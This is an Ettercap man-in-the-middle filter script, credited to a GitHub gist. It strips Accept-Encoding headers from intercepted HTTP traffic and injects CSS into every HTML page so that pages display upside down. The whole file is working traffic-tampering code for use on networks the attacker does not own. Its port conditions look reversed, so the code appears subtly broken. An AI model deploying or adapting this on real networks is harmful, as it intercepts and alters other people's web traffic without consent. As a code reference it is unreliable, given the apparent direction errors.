############################################################################
#                                                                          #
#  HTTPS Request/Response Filter                                           #
#  sourcecode from seannicholls github                                     #
#  https://gist.github.com/seannicholls/5292296                            #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################

##
#  Rotate the Internet using Ettercap and CSS3 Transforms.
#  use rotate.eft ettercap filter to inject some CSS3 code
#  into every HTML document so that its rotated 180 degrees.
#  By: seannicholls
##


##########################
## Zap Content Encoding ##
##########################
if (ip.proto == TCP && tcp.src == 80) {
  if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding","Accept-Nothing!");
    msg("[Morpheus] Encoding zapped.");
  }
}


#####################
## Replace Content ##
#####################
if (ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "<head>")) {
    replace("<head>", "<head><style>body{-webkit-transform:rotate(-180deg) !important;-ms-transform:rotate(-180deg) !important;-moz-transform:rotate(-180deg) !important;}</style>");
    msg("[Morpheus] rotate document 180 degrees...\n");
  }
}


